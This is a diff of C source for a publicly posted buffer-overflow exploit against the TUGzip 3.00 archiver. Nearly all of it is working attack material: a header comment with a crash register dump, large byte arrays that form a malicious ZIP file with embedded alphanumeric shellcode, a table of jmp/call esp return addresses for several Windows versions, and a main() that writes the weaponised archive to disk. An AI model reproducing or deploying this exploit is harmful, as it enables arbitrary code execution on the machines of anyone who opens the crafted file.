-                    "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
-                    "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
-                    "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
-                    "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
-                    
-         struct addresses
-                     { char *platform;
-                       unsigned long addr; 
-                     } 
-                                                                                            targets[]=
-                     {                                                                       
-                                                 
-                                                 {  "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf                  },
-                                                 {  "[*]Microsoft Windows Pro sp3 English (call esp)",0x7C8369F0                             },
-                                                 {  "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B                              },
-                                                 {  "[*]Windows XP 5.1.2.0 SP2 (IA32) English (jmp esp)",0x7d184de7                          },
-                                                 {  "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197                           },
-                                                 {  "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208                        },
-                                                 {  "[*]Crash the program",0x58585858                                                        },
-                                                 {NULL                                                                                       }
-                     };         
-                       
- int main(int argc,char *argv[])
-  { FILE *h;
-    char *buffer;
-    buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2));
-    unsigned int offset=0;
-    int number;  
-    unsigned int retaddress=targets[atoi(argv[2])].addr; 
-       if(argc<2) 
-                       {     printf("#   \tChose your Platform #\n"); 
-                             for(int i=0;targets[i].platform;i++)
-                             printf("%d \t\t %s\n",i,targets[i].platform);
-                             printf("\tUsage is:\n");
-                             printf(argv[0]);
-                             printf(".exe ");
-                             printf("filename.zip ");
-                             printf("platform\n");                  
-                             printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");  
-                       
-                             system("color 02");
-                             Sleep(2000);
-                          return 0;  
-                       }
-                       
-     if((h=fopen(argv[1],"wb"))==NULL)
-  {    printf("error\n"); 
-       exit(0);
-  }
-                 
-     memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1);   
-     memcpy(buffer+offset-1,file_2,sizeof(file_2));    offset=OFFSET;
-     memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP;
-     memset(buffer+offset,0x90,20);
-      
-      printf("#___________________________________________________________________________#\n");
-      printf("Now chose your shellcode \n");
-      printf("Press [1] for Alphanumeric shellcode\n");
-      printf("Press [2] for NonAphanumeric shellcode\n");
-      printf("#___________________________________________________________________________#\n");
-       
-                   scanf("%d",&number);                   
-                                      switch(number)
-                         { case 1:
-                                 offset=shellcode_offset;
-                                 memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1));                  
-                           case 2:
-                                 offset=shellcode_offset;
-                                 memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2)); 
-                         }                        
-     fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h); 
-     printf("Building file ...\n");
-     printf("Done ! Open with TUGzip and see what happens :) \n");
-     printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n"); 
-     fclose(h);
-     free(buffer);
-return 0;    
-       }
-
-// milw0rm.com [2008-10-24]
+/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow
+ "If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK)
+  Well hello there ,greetz from Romania,here is a exploit for the archiver TUGzip.
+  So the payload doesen't always execute,it's just a matter of patience,from 10 
+  attemps you get success on 2 in the best case.Got 3 more archivers with stack
+  overflow and heap overflow,I'm bored... I'm looking for a new approach,will see
+  soon what I'm going to bring you.
+  "Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa"
+  Credits go to Stefan Marin or fl0 fl0w :) .
+    All the best !
+  
+Registers
+EAX 00000000
+ECX 00000064
+EDX 0013F6D0
+EBX 0117ABDC
+ESP 0013F6D0
+EBP 45444342
+ESI 0117AF6C
+EDI 00D88B1C
+EIP 58585858
+
+SEH chain of main thread, item 0
+ Address=0013F6D0
+ SE handler=C9C9C9C9
+
+*/
+#include
+#include
+#include
+#include
+
+#define OFFSET 2504
+#define NOP 2515    
+#define shellcode_offset 2535
+
+
+char file_1[]=
+  "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x66\x66\x64\x73\x75\x69\x62\x7A\x65\x6F\x69\x76\x7A\x20\x66\x68"
+"\x65\x6F\x20\x79\x66\x6F\x7A\x69\x61\x71\x20\x6F\x69\x65\x61\x7A"
+"\x75\x20\x7A\x71\x6F\x66\x68\x75\x65\x7A\x71\x6F\x69\x65\x6E\x66"
+"\x65\x7A\x6A\x75\x71\x63\x62\x75\x71\x70\x7A\x61\x7A\x69\x27\x74"
+"\x75\x72\x65\x6F\x7A\x6E\x62\x69\x6A\x75\x76\x62\x67\x73\x64\x75"
+"\x69\x71\x79\x72\x7A\x61\x6A\x20\x62\x63\x73\x64\x6F\x70\x69\x75"
+"\x72\x79\x7A\x6F\x65\x61\x71\x6E\x62\x69\x6F\x64\x73\x79\x72\x66"
+"\x65\x7A\x71\x6F\x69\x70\x62\x75\x66\x63\x73\x71\x69\x75\x79\x72"
+"\x61\x7A\x62\x69\x6A\x65\x66\x62\x68\x73\x75\x69\x71\x76\x64\x73"
+"\x71\x69\x6A\x62\x66\x65\x7A\x71\x75\x61\x66\x64\x64\x64\x64\x64"
+"\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x68\x68"
+"\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x75\x75\x75"
+"\x75\x75\x75\x75\x75\x75\x75\x75\x68\x76\x71\x24\x69\x66\x72\x7A"
+"\x65\x6F\x62\x76\x69\x6F\x7A\x65\x71\x66\x74\x72\x65\x6F\x7A\x71"
+"\x6A\x6E\x62\x76\x64\x73\x70\x69\x79\x75\x66\x71\x6F\x65\x69\x68"
+"\x66\x72\x6F\x75\x65\x7A\x68\x61\x72\x62\x20\x69\x76\x66\x64\x73"
+"\x70\x6F\x68\x6A\x72\x65\x71\x6F\x75\x68\x66\x7A\x65\x61\x71\x75"
+"\x68\x76\x71\x6F\x75\x68\x65\x66\x6F\x71\x73\x69\x6A\x68\x64\x6F"
+"\x73\x71\x68\x76\x64\x6F\x69\x68\x7A\x61\x71\x6F\x65\x69\x68\x66"
+"\x64\x73\x6F\x69\x75\x68\x76\x63\x78\x77\x69\x75\x68\x66\x71\x6F"
+"\x75\x69\x68\x76\x77\x78\x6F\x69\x68\x66\x64\x73\x71\x6F\x69\x68"
+"\x76\x64\x73\x71\x6F\x69\x75\x68\x7A\x67\x66\x6F\x69\x68\x73\x64"
+"\x71\x6F\x69\x75\x68\x67\x7A\x65\x71\x6F\x69\x68\x67\x73\x71\x6F"
+"\x69\x68\x67\x7A\x61\x65\x7A\x72\x75\x79\x61\x75\x79\x74\x61\x65"
+"\x70\x69\x75\x79\x55\x59\x54\x4F\x5A\x52\x45\x50\x49\x48\x47\x41"
+"\x5A\x55\x59\x56\x44\x53\x4F\x49\x59\x54\x41\x50\x4F\x49\x55\x45"
+"\x59\x52\x49\x55\x45\x5A\x59\x47\x42\x4B\x4A\x43\x58\x4E\x4B\x56"
+"\x4E\x4B\x43\x58\x42\x57\x56\x4B\x4A\x4E\x42\x43\x58\x48\x42\x4B"
+"\x4A\x44\x48\x46\x4F\x49\x48\x5A\x45\x52\x4F\x49\x55\x48\x45\x5A"
+"\x55\x49\x4F\x41\x42\x45\x5A\x55\x49\x42\x47\x55\x49\x56\x43\x50"
+"\x4C\x44\x53\x47\x57\x4B\x52\x54\x42\x4E\x49\x55\x43\x49\x55\x4F"
+"\x51\x45\x42\x48\x52\x55\x49\x59\x44\x46\x51\x50\x5A\x49\x55\x45"
+"\x52\x50\x49\x55\x44\x59\x46\x54\x50\x41\x49\x5A\x55\x45\x59\x52"
+"\x5A\x45\x55\x48\x52\x54\x49\x55\x50\x56\x58\x57\x4B\x4A\x43\x4E"
+"\x48\x42\x47\x50\x46\x4F\x49\x55\x50\x41\x49\x52\x59\x45\x5A\x4F"
+"\x41\x49\x54\x59\x38\x37\x33\x32\x39\x35\x36\x35\x39\x34\x38\x33"
+"\x32\x36\x35\x46\x53\x34\x38\x59\x46\x44\x53\x39\x38\x59\x55\x56"
+"\x47\x30\x39\x38\x51\x59\x55\x52\x30\x39\x38\x34\x59\x35\x32\x33"
+"\x39\x38\x41\x59\x39\x46\x38\x45\x51\x59\x5A\x35\x39\x38\x59\x36"
+"\x39\x38\x46\x47\x59\x39\x38\x51\x59\x39\x47\x46\x44\x53\x55\x59"
+"\x30\x39\x48\x34\x5A\x48\x33\x37\x38\x35\x32\x33\x31\x42\x34\x47"
+"\x38\x30\x47\x46\x44\x53\x55\x49\x42\x56\x51\x49\x55\x4F\x59\x50"
+"\x52\x39\x5A\x48\x46\x44\x53\x51\x55\x49\x47\x46\x47\x44\x55\x53"
+"\x53\x53\x53\x53\x45\x47\x46\x39\x32\x47\x35\x33\x34\x55\x47\x46"
+"\x39\x49\x53\x50\x47\x42\x55\x54\x50\x5A\x39\x38\x59\x35\x33\x41"
+"\x41\x42\x43\x43\x46\x52\x45\x43\x43\x45\x54\x52\x45\x5A\x47\x52"
+"\x46\x44\x53\x49\x4F\x5A\x48\x45\x52\x42\x4E\x4F\x56\x46\x44\x53"
+"\x4F\x49\x52\x48\x54\x4F\x5A\x49\x4E\x46\x47\x44\x4B\x4E\x46\x43"
+"\x58\x4C\x4B\x59\x89\x05\x8A\x9B\x98\x98\x98\x4F\x49\x49\x49\x49"
+"\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42"
+"\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48"
+"\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44"
+"\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F\x4D\x4E\x4F\x4C\x36\x4B"
+"\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x42\x36\x4B"
+"\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45\x44\x4E\x43\x4B\x38\x4E"
+"\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B\x48\x4F\x34\x4A\x51\x4B"
+"\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49\x44\x4B\x38\x46\x43\x4B"
+"\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49\x59\x4E\x4A\x46\x58\x42"
+"\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D\x30\x41\x30\x44\x4C\x4B"
+"\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A\x52\x45\x57\x45\x4E\x4B"
+"\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48\x36\x4B\x58\x4E\x50\x4B"
+"\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B\x4E\x43\x30\x4E\x52\x4B"
+"\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41\x36\x43\x4C\x41\x43\x4B"
+"\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B\x48\x42\x44\x4E\x50\x4B"
+"\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42\x44\x4A\x30\x50\x45\x4A"
+"\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42\x35\x4F\x4F\x48\x4D\x48"
+"\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44\x33\x4A\x56\x47\x37\x43"
+"\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42\x4D\x4A\x36\x4B\x4C\x4D"
+"\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48\x4D\x4F\x45\x49\x58\x45"
+"\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44\x30\x45\x35\x4C\x36\x44"
+"\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49\x50\x45\x4F\x4D\x4A\x47"
+"\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43"
+"\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42\x4D\x48\x46\x4A\x56\x41"
+"\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41\x4E\x45\x59\x4A\x46\x46"
+"\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F\x4F\x48\x4D\x4C\x36\x42"
+"\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x46\x4A\x4D\x4A\x50"
+"\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43\x55\x45\x45\x4F\x4F\x42"
+"\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49\x44\x47\x45\x4F\x4F\x48"
+"\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F\x4F\x42\x4D\x43\x39\x4A"
+"\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47\x45\x4F\x4F\x48\x4D\x45"
+"\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46\x36\x48\x36\x4A\x56\x43"
+"\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42\x45\x49\x35\x49\x32\x4E"
+"\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49\x58\x44\x4E\x41\x43\x42"
+"\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D\x32\x50\x4F\x44\x34\x4E"
+"\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B\x4A\x4B\x4A\x4B\x4A\x4A"
+"\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F\x4F\x45\x37\x46\x44\x4F"
+"\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4C"
+"\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4F\x4F\x42\x4D\x4A"
+"\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43\x55\x4F\x4F\x48\x4D\x4C"
+"\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42\x4D\x4B\x48\x47\x45\x4E"
+"\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48\x4D\x44\x45\x4F\x4F\x42"
+"\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F\x45\x43\x55\x4F\x4F\x48"
+"\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xFD\x81\x98\x98\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x2E\x74"
+"\x78\x74\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC"
+"\xCE\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08"
+"\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
+"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
+"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x43\x43\x43\x43\x43\x43\x43\x43\x43"
+"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x41\x42\x43\x44\x45\x58\x58\x58\x58\x41\x41\x41\x41";
+
+  char file_2[]=
+"\x41\x41\x41\x41\xCC\xCC\xCC\xCC\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4A\x4A\x4A\x4A\x4A\x4A"
+"\x4A\x4A\x4A\x4A\x4A\x4A\x4A\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B"
+"\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C"
+"\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x4D\x4D\x4D\x4D\x4D\x4D\x4D\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E"
+"\x4E\x4E\x4E\x4E\x4E\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4F\x4F\x4F\x4F"
+"\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x50\x50\x50\x50\x50\x50"
+"\x50\x50\x50\x50\x50\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x51\x51\x51\x51\x51\x51\x51"
+"\x51\x51\x32\x32\x32\x32\x32\x89\x03\x59\x89\x05\x8A\x9B\x98\x98"
+"\x98\x4F\x49\x49\x49\x49\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30"
+"\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56"
+"\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42"
+"\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F"
+"\x4D\x4E\x4F\x4C\x36\x4B\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F"
+"\x4F\x4F\x4F\x42\x36\x4B\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45"
+"\x44\x4E\x43\x4B\x38\x4E\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B"
+"\x48\x4F\x34\x4A\x51\x4B\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49"
+"\x44\x4B\x38\x46\x43\x4B\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49"
+"\x59\x4E\x4A\x46\x58\x42\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D"
+"\x30\x41\x30\x44\x4C\x4B\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A"
+"\x52\x45\x57\x45\x4E\x4B\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48"
+"\x36\x4B\x58\x4E\x50\x4B\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B"
+"\x4E\x43\x30\x4E\x52\x4B\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41"
+"\x36\x43\x4C\x41\x43\x4B\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B"
+"\x48\x42\x44\x4E\x50\x4B\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42"
+"\x44\x4A\x30\x50\x45\x4A\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42"
+"\x35\x4F\x4F\x48\x4D\x48\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44"
+"\x33\x4A\x56\x47\x37\x43\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42"
+"\x4D\x4A\x36\x4B\x4C\x4D\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48"
+"\x4D\x4F\x45\x49\x58\x45\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44"
+"\x30\x45\x35\x4C\x36\x44\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49"
+"\x50\x45\x4F\x4D\x4A\x47\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43"
+"\x35\x43\x35\x43\x35\x43\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42"
+"\x4D\x48\x46\x4A\x56\x41\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41"
+"\x4E\x45\x59\x4A\x46\x46\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F"
+"\x4F\x48\x4D\x4C\x36\x42\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A"
+"\x56\x46\x4A\x4D\x4A\x50\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43"
+"\x55\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49"
+"\x44\x47\x45\x4F\x4F\x48\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F"
+"\x4F\x42\x4D\x43\x39\x4A\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47"
+"\x45\x4F\x4F\x48\x4D\x45\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46"
+"\x36\x48\x36\x4A\x56\x43\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42"
+"\x45\x49\x35\x49\x32\x4E\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49"
+"\x58\x44\x4E\x41\x43\x42\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D"
+"\x32\x50\x4F\x44\x34\x4E\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B"
+"\x4A\x4B\x4A\x4B\x4A\x4A\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F"
+"\x4F\x45\x37\x46\x44\x4F\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41"
+"\x35\x41\x45\x41\x35\x4C\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41"
+"\x45\x4F\x4F\x42\x4D\x4A\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43"
+"\x55\x4F\x4F\x48\x4D\x4C\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42"
+"\x4D\x4B\x48\x47\x45\x4E\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48"
+"\x4D\x44\x45\x4F\x4F\x42\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F"
+"\x45\x43\x55\x4F\x4F\x48\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
